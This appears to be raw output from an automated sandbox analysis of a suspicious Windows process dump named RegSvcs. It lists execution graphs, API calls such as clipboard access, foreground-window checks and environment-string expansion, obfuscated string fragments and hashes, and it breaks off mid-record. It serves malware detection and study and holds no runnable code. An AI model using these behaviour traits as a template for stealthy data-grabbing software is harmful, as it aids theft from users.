                                                                                                                                      execution_graph 14250 408740 14252 40874f 14250->14252 14251 408a02 ExitProcess 14252->14251 14253 408764 GetCurrentProcessId GetCurrentThreadId 14252->14253 14258 408969 14252->14258 14254 40878a 14253->14254 14255 40878e SHGetSpecialFolderPathW GetForegroundWindow 14253->14255 14254->14255 14256 408858 14255->14256 14259 43e840 14256->14259 14258->14251 14262 441860 14259->14262 14261 43e84a RtlAllocateHeap 14261->14258 14263 441880 14262->14263 14263->14261 14263->14263 14264 40ae60 14266 40aef0 14264->14266 14267 40af15 14266->14267 14268 440260 14266->14268 14269 4402a5 14268->14269 14270 440278 14268->14270 14271 44029a 14268->14271 14274 440286 14268->14274 14275 4402a0 14268->14275 14277 43e860 14269->14277 14270->14269 14270->14274 14270->14275 14272 43e840 RtlAllocateHeap 14271->14272 14272->14275 14276 44028b RtlReAllocateHeap 14274->14276 14275->14266 14276->14275 14278 43e873 14277->14278 14279 43e892 14277->14279 14280 43e878 RtlFreeHeap 14278->14280 14279->14275 14280->14279 14303 4408d4 14304 4408f0 14303->14304 14304->14304 14305 44097e 14304->14305 14307 4402d0 LdrInitializeThunk 14304->14307 14307->14305 14308 4406f4 14309 44073e 14308->14309 14310 440715 14308->14310 14310->14309 14312 4402d0 LdrInitializeThunk 14310->14312 14312->14309 14281 440f47 14283 440e70 14281->14283 14284 440e7e 14281->14284 14282 440ece 14283->14284 14288 4402d0 LdrInitializeThunk 14283->14288 14284->14282 14287 4402d0 LdrInitializeThunk 14284->14287 14287->14282 14288->14284 14313 443230 14315 443250 14313->14315 14314 44333e 14315->14314 14317 4402d0 LdrInitializeThunk 14315->14317 14317->14314 14289 4406a2 GetForegroundWindow 14293 4421b0 14289->14293 14291 4406ae GetForegroundWindow 14292 4406bd 14291->14292 14294 4421c6 14293->14294 14294->14291 14318 43aa74 14319 43aa8c 14318->14319 14320 43aaaf GetUserDefaultUILanguage 14319->14320 14321 43aad6 14320->14321 14295 440a0d 14296 440a17 14295->14296 14299 440afe 14296->14299 14302 4402d0 LdrInitializeThunk 14296->14302 14298 440c1e 14299->14298 14301 4402d0 LdrInitializeThunk 14299->14301 14301->14298 14302->14299 14322 440e39 14323 440e5d 14322->14323 14324 440d73 14322->14324 14326 440dae 14324->14326 14327 4402d0 LdrInitializeThunk 14324->14327 14327->14326

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00408764
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0040876E
                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087C0
                                                                                                                                      • GetForegroundWindow.USER32 ref: 0040884A
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00408A04
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                      • String ID: b/7
                                                                                                                                      • API String ID: 4063528623-2085417233
                                                                                                                                      • Opcode ID: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                      • Instruction ID: 0d5a416f21ca3bcde6c043f2d710c8a16f1e6c6a059847071c546a7df00bc279
                                                                                                                                      • Opcode Fuzzy Hash: 183a38287acbdcb6fd43605bfd40e65d67f3e3b4632bc5cfca641c35649d64ef
                                                                                                                                      • Instruction Fuzzy Hash: EF71FB73A043154BC318EF79CD8576AF6D6ABC5320F0A863DE5C4A73D1EA7898048B85

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 155 4402d0-440302 LdrInitializeThunk
                                                                                                                                      APIs
                                                                                                                                      • LdrInitializeThunk.NTDLL(00443370,?,00000018,?,?,00000018,?,?,?), ref: 004402FE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                      • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                      • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetForegroundWindow.USER32 ref: 004406A2
                                                                                                                                      • GetForegroundWindow.USER32 ref: 004406B1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ForegroundWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2020703349-0
                                                                                                                                      • Opcode ID: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                      • Instruction ID: ab39d18eea59de8c0b680b80bbae726c1476b453b8e9e2f579cb72a53367ea8f
                                                                                                                                      • Opcode Fuzzy Hash: cd25495a08ae7a881a864ea32b03c02376aebc77bdf23d09393fa069b7b014e1
                                                                                                                                      • Instruction Fuzzy Hash: 4AD0C7F95905018FD705D771BD8542A36397A4620D38C903DF50741613FD35502A8B5B

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 122 43aa74-43aa9a call 441c60 125 43aa9e-43aaab call 413e40 * 2 122->125 126 43aa9c 122->126 131 43aaaf-43aad4 GetUserDefaultUILanguage 125->131 132 43aaad 125->132 126->125 133 43aad6-43aad9 131->133 132->131 134 43aadb-43aafb 133->134 135 43aafd-43ab29 133->135 134->133
                                                                                                                                      APIs
                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE ref: 0043AAAF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                      • Opcode ID: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                      • Instruction ID: 2db82b081659a11ebf0adced019d600d4025aec70a5b2eba15313fbfae0b0d52
                                                                                                                                      • Opcode Fuzzy Hash: c63114d8942900f552c7ab432bca405393180debf0d13cc5872ecb3af4bd1074
                                                                                                                                      • Instruction Fuzzy Hash: B0112636A482A58FD719DB3CCA4476DBFA26F8A300F0980ADC4C997385CB789D60C753

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 136 440260-440271 137 4402a5-4402a6 call 43e860 136->137 138 440286-440298 call 441860 RtlReAllocateHeap 136->138 139 4402c0 136->139 140 4402c2 136->140 141 440278-44027f 136->141 142 44029a-4402a3 call 43e840 136->142 148 4402ab-4402b3 137->148 145 4402c4-4402c6 138->145 139->140 140->145 141->137 141->138 141->139 141->140 142->145 148->139
                                                                                                                                      APIs
                                                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B51C,00000000,00000001), ref: 00440292
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                      • Instruction ID: 9d73e3fc9da24b4a25dc6ea464106973b4d99c6e73c38ef93f1a8f1a834cd47d
                                                                                                                                      • Opcode Fuzzy Hash: 62298e30a4241653b6984ab1444618431f42e0cdb861d2290b65488c60bec4cd
                                                                                                                                      • Instruction Fuzzy Hash: EFF0203A909200EBE2006F2ABC05A173668BF8A325F020876F000D31A5D738E8218A9B

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 150 43e860-43e86c 151 43e873-43e889 call 441860 RtlFreeHeap 150->151 152 43e892-43e893 150->152 151->152
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B51C,00000000,00000001), ref: 0043E87E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                      • Instruction ID: edab8ee5216d5c962334db0beb90db3a31f2e897247f77843e17d527c4ab1b3a
                                                                                                                                      • Opcode Fuzzy Hash: d4ba0eb0295cb291fecaea3e71dbbc32e179608d3b32058e4b112bc51f780ac0
                                                                                                                                      • Instruction Fuzzy Hash: F0D0A734188121DFD7005F14FC05B873758DF0A351F020872B404AB1B5C234EC50C69C

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 156 43e840-43e857 call 441860 RtlAllocateHeap
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,67660564,00408969,67660564), ref: 0043E850
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                      • Instruction ID: 1c12cdc91dcc22cd6618a30bc84945b256d08a32317763a8f107efb347479c5b
                                                                                                                                      • Opcode Fuzzy Hash: 3bcc0ae032fcfa855b4001ec6a7ed76c7c2836dbd2700616eddc664b251f816c
                                                                                                                                      • Instruction Fuzzy Hash: E4C09B31145120ABD5103F15FC05FC67F64DF45391F010465B00467076C760BC91C6DD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                                                                                      • API String ID: 0-2870231824
                                                                                                                                      • Opcode ID: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                                                                                      • Instruction ID: e4eadb167d9284e983c6371bd9484b3f2b8716763c332f31a73ee98d54a9440e
                                                                                                                                      • Opcode Fuzzy Hash: df71505268c028ffb0bd486a89103a37c107dc5adc46b736a241bad54def65e1
                                                                                                                                      • Instruction Fuzzy Hash: E53209B160C7D48AD334CF14C442BDFBAF2EB92304F00892DC5E96B215D7B6564A8B9B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !h#n$&P%V$(X6^$)p*v$-tz$.D)J$.H>N$2{<u$4~|$7w$;T&Z$BpFv$G0]6$K4l:$Rd"j$T8e>$T`Zf$U\$_lYr$`g$o<KB${x$|,X2$8>$rp$tj$x~
                                                                                                                                      • API String ID: 0-2870231824
                                                                                                                                      • Opcode ID: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                                                                                      • Instruction ID: 85683be32e8b5f4f428226e946852424525cd865b1790a78dd48afa17569a373
                                                                                                                                      • Opcode Fuzzy Hash: bb8f5c017a04f448ec77eaa504b06c268e6e3bd4e83d5db79ec8c788eea25bd9
                                                                                                                                      • Instruction Fuzzy Hash: 423208B160C7D48AD334CF14C442BDFBAF2EB92304F40892DC5E96B215D7B6564A8B9B
                                                                                                                                      APIs
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00423E6A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                      • String ID: 4Y>[$<QrS$A!K#$H%Z'$O-O/$P5Y7$Y1\3$d)E+$UW$]_
                                                                                                                                      • API String ID: 237503144-2105826625
                                                                                                                                      • Opcode ID: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                      • Instruction ID: 7b8528e6acc013927f719d16868986943a9a1bba7e440ced0a90d285d0ff4e0a
                                                                                                                                      • Opcode Fuzzy Hash: da20fe91c137fba8db0f0ac651f99c9cc8c2ccb7c5bb45a873dc5b59e8d89680
                                                                                                                                      • Instruction Fuzzy Hash: 24D1EAB0608361DBC310CF55E88126BBBF0EF95354F448A2EF9D99B351E3789906CB96
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AtP$GpFv$LH$LH$[T
                                                                                                                                      • API String ID: 0-1191849916
                                                                                                                                      • Opcode ID: f5bdcb7a732ddf254fafd304af6d9d94ed1886ef2df9d39a57eeaa40ca4331dd
                                                                                                                                      • Instruction ID: 4372fb21f11b9819d30698d9d45361d0369da0689afe6659426da76e72155524
                                                                                                                                      • Opcode Fuzzy Hash: f5bdcb7a732ddf254fafd304af6d9d94ed1886ef2df9d39a57eeaa40ca4331dd
                                                                                                                                      • Instruction Fuzzy Hash: C872F275600B01CFD724CF29C8917A3B7B2FF8A314B19896DD8968B7A1D739E842CB54
                                                                                                                                      APIs
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?,?,?,?,?,00000000,?), ref: 004164C7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                      • String ID: AtP$GpFv$LH$LH$[T
                                                                                                                                      • API String ID: 237503144-1191849916
                                                                                                                                      • Opcode ID: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                                                                                      • Instruction ID: 33ac3c3fba2e5f2169ec6e70d98a4de6486b49fd6ba05196e176a44067b630e5
                                                                                                                                      • Opcode Fuzzy Hash: 1b588242ea16f88214a7b3f74664b69940c21a90d5ac88c4a02d85973340d39e
                                                                                                                                      • Instruction Fuzzy Hash: D83224756007018FC724CF29C8917A3B7F2FF96314B1A85ADD8968B7A1D739E842CB54
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Object$DeleteMetricsSelectSystem
                                                                                                                                      • String ID: $AnC$phC
                                                                                                                                      • API String ID: 3911056724-4014303587
                                                                                                                                      • Opcode ID: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                      • Instruction ID: 106fc45ad3404cda282eaa32535b81ccc0e8128c77ede95de355203d1d43b79a
                                                                                                                                      • Opcode Fuzzy Hash: 4b54decef5b36cd588d2dbc9a87a4afe110f140ad871a0f396ba4e0a0775b21e
                                                                                                                                      • Instruction Fuzzy Hash: 0461A3B04497848FE760EF68D58978FBBE0BB85304F00892EE5D88B251D7B85458DF4B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -C$$&C$%!C$:/C$:/C$B-C$F1C$d/C$d/C$p+C$u'C
                                                                                                                                      • API String ID: 0-709081256
                                                                                                                                      • Opcode ID: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                      • Instruction ID: d9a4a0d359dcb2b16ba7e2780f5c8e827f4dfc1ae0afff22db1dab9ef28774d1
                                                                                                                                      • Opcode Fuzzy Hash: 407d260e2984e500bc938a2af9084afc88076a4a5a4afd9904190e82843a23c4
                                                                                                                                      • Instruction Fuzzy Hash: 6792A6B0615B809FD3A1CF3DC841793BBE8AB1A301F14496EE1EED7342D775A9408B69
                                                                                                                                      APIs
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00424698
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                                      • String ID: =jh$D6v4$}z
                                                                                                                                      • API String ID: 237503144-2424248051
                                                                                                                                      • Opcode ID: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                      • Instruction ID: 072dcfe1279749a49c563166b893412059df4ddb98baf7635cf88deb1ed00509
                                                                                                                                      • Opcode Fuzzy Hash: 4c05a009a65ea3e28b23781bbd6519d7c2246800a1a7ede0d36e82eaf8dc30d2
                                                                                                                                      • Instruction Fuzzy Hash: E071227560C3509FE7208F24EC4175FBBE4EBC2718F10892DF5A49B291DBB4980A8B96
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1006321803-0
                                                                                                                                      • Opcode ID: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                      • Instruction ID: b86dd0c9fbfd43ae0b58d105ee5404c8a2eb2c5d505c68a19c0745f829c1e84f
                                                                                                                                      • Opcode Fuzzy Hash: 81a847a3543872956842440432a8dfee523cfdb2ded88c6c7e7e11ec6d44b1fe
                                                                                                                                      • Instruction Fuzzy Hash: C941D1B1908B529FD700AF7C988925ABFA0AB06320F05873EE8E5973C6D3389555C797
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AtP$GpFv$LH
                                                                                                                                      • API String ID: 0-40351562
                                                                                                                                      • Opcode ID: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                      • Instruction ID: 6bb0aad597ceb399f229923281458bf5411d9ceb9ec5dfacab6a3e1016280f03
                                                                                                                                      • Opcode Fuzzy Hash: 576404afa7e41153aeffadb6763136bbdbb0afcb7c2826d3ac7b4f79fb061b07
                                                                                                                                      • Instruction Fuzzy Hash: 04C1F275200B018FC725CF29C891663B7F2FF96314B1A896ED8968B7A5E778F841CB44
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365D0
                                                                                                                                        • Part of subcall function 00436590: GetSystemMetrics.USER32 ref: 004365E0
                                                                                                                                        • Part of subcall function 00436590: DeleteObject.GDI32 ref: 00436623
                                                                                                                                        • Part of subcall function 00436590: SelectObject.GDI32 ref: 00436673
                                                                                                                                        • Part of subcall function 00436590: SelectObject.GDI32 ref: 004366CA
                                                                                                                                        • Part of subcall function 00436590: DeleteObject.GDI32 ref: 004366F8
                                                                                                                                      • CoUninitialize.OLE32 ref: 0040D6A0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Object$DeleteMetricsSelectSystem$Uninitialize
                                                                                                                                      • String ID: ;d$SD$TC03$^_/C
                                                                                                                                      • API String ID: 1556769885-3729532250
                                                                                                                                      • Opcode ID: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                      • Instruction ID: 40ffb7c8dda840b4bdf12d856fc54da81b6c6fcd26267cd1a4ca77b1afe074d2
                                                                                                                                      • Opcode Fuzzy Hash: 2812e617d036c375e3da603f544641752ab874253ccd01004949b5816314b26e
                                                                                                                                      • Instruction Fuzzy Hash: 0DA1F6B56047918FD719CF39C4A0262BFE1FFA7314B28819DC0D64BB86D739A406CB99
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: KWYb$R^lf$V]E^$[NC~$puGG
                                                                                                                                      • API String ID: 0-3448173581
                                                                                                                                      • Opcode ID: d290200162835d723fde62e1bbbca7ea0805bfb57caa6d4a89d881f1a637874a
                                                                                                                                      • Instruction ID: 136c07a549b812a85170c773b68f542c8dc67558d112d0f44613d1a83f6642fd
                                                                                                                                      • Opcode Fuzzy Hash: d290200162835d723fde62e1bbbca7ea0805bfb57caa6d4a89d881f1a637874a
                                                                                                                                      • Instruction Fuzzy Hash: 18E16475608601DFC7248F29CC816A777B2FF8A310F19857ED5568B7A1E739E842CB48
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <$C|$WR$~Bzx$~|
                                                                                                                                      • API String ID: 0-1711356705
                                                                                                                                      • Opcode ID: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                                                                                      • Instruction ID: c242de3d159764505c2276e72245a45d8931141d93d3f41c6525b63a99f65b4f
                                                                                                                                      • Opcode Fuzzy Hash: 759e3f713937f53d1145da5574e760211f3564257749ddce68042d6697c28895
                                                                                                                                      • Instruction Fuzzy Hash: 3BD1287664C3504BD318CF29885126FBBE3ABC2314F19897EE4D5AB381C779C90A8787
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$76$745:2$76$_\]$p@
                                                                                                                                      • API String ID: 0-2055486527
                                                                                                                                      • Opcode ID: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                                                                                      • Instruction ID: d14b64437fda7db03077973c55caa55540a0466a372fa5b5a151a26c722ec16b
                                                                                                                                      • Opcode Fuzzy Hash: 692f9ee771d2d81641aa3ae234354e2c9c2a2707556fcb6c8f5c436a55a784cf
                                                                                                                                      • Instruction Fuzzy Hash: 5CD1CF716183508FD724CF64D891BABBBF0EF95318F04882DE98587392E7B9E845CB46
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(D7DADAD1), ref: 0042DE55
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: #v$3Z{
                                                                                                                                      • API String ID: 3664257935-3529036974
                                                                                                                                      • Opcode ID: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                                                      • Instruction ID: 974a3689560b078f5541bff02c23d3e4bc65e838cbd55ddb6ad84d7362020e57
                                                                                                                                      • Opcode Fuzzy Hash: 52e2302ab1351103ee4792a9557da4963a6bcc2172eb5e395f038b61ae502095
                                                                                                                                      • Instruction Fuzzy Hash: F641F1706047819FE7268F249890B63BFE1AF67304F28449DE4D65F392D72A9806CB65
                                                                                                                                      APIs
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042A8EB
                                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042A97D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2194420651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
